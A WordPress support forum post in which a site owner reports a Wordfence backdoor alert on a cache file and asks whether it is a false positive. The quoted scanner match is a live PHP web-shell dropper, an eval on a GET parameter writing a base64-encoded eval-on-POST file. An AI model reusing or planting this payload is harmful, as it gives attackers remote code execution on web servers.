Backdoor:PHP/rce.1091
-
WordFence scan just flagged the following:
- Filename: meta-wp-cache-903cc823335e8c894ee76962e8c7f802.php
- File Type: Not a core, theme, or plugin file from wordpress.org.
- Details: This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is: @eval($_GET%5B%27fuck%27%5D);&fuck=fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz54YnNoZWxs));gzip-text\/html”}
The issue type is: Backdoor:PHP/rce.10912
Description: Remote code execution that is often featured in backdoors
This is the first instance of this happening. I have found some info here: https://wordpress.org/support/topic/frequent-malware-in-wp-super-cache-cached-pages/
I have deleted the file, and after reading the thread above and the original from here it appears to be a false positive, but any feedback is appreciated. Thanks.
Viewing 3 replies - 1 through 3 (of 3 total)
Viewing 3 replies - 1 through 3 (of 3 total)
The topic ‘Backdoor:PHP/rce.1091’ is closed to new replies.